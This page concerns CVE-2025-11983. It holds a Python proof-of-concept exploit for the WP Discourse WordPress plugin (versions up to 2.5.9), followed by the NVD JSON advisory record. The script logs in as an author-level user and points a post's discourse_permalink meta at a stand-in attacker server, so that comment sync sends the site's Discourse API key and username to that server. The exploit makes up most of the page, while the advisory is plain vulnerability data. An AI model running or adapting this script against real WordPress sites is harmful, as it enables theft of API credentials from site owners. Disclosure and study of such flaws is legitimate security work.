CVE-2025-11983

import requests import json # CVE-2025-11983 PoC - WP Discourse API Credential Exfiltration # Target: WordPress site with WP Discourse plugin <= 2.5.9 TARGET_URL = "http://target-wordpress-site.com" ATTACKER_LISTENER = "http://attacker-controlled-server.com/collect" USERNAME = "attacker_author" PASSWORD = "password123" def exploit(): """ Exploitation steps: 1. Authenticate to WordPress with author-level account 2. Create or modify a post with malicious discourse_permalink meta 3. Trigger comment sync to exfiltrate API credentials """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'rememberme': 'forever', 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Step 2: Get or create a post posts_url = f"{TARGET_URL}/wp-json/wp/v2/posts" posts = session.get(posts_url).json() if posts: post_id = posts[0]['id'] # Step 3: Add malicious discourse_permalink meta meta_url = f"{TARGET_URL}/wp-json/wp/v2/posts/{post_id}" meta_data = { 'meta': { 'discourse_permalink': ATTACKER_LISTENER } } session.post(meta_url, json=meta_data) print(f"[+] Set discourse_permalink to {ATTACKER_LISTENER} on post {post_id}") # Step 4: Trigger comment sync (usually automatic via webhook or manual) # The plugin will send API request to attacker-controlled server # containing Discourse Api-Key and Api-Username headers print("[+] Waiting for credential exfiltration...") print("[*] Check attacker server for incoming API credentials") else: print("[-] No posts available, create a new post first") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-11983", "sourceIdentifier": "[email protected]", "published": "2025-11-01T06:15:39.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Discourse plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5.9. This is due to the plugin unconditionally sending Discourse API credentials (Api-Key and Api-Username headers) to any host specified in a post's discourse_permalink custom field during comment synchronization. This makes it possible for authenticated attackers, with author-level access and above, to exfiltrate sensitive Discourse API credentials to attacker-controlled servers, as well as query internal services and potentially perform further attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-discourse/tags/2.5.9/lib/discourse-comment.php#L211", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-discourse/tags/2.5.9/lib/discourse-comment.php#L218", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-discourse/tags/2.5.9/lib/plugin-utilities.php#L486", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3384149%40wp-discourse&new=3384149%40wp-discourse&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b1524f3-1c59-49a1-bbe3-94dcfd232b1d?source=cve", "source": "[email protected]"}]}}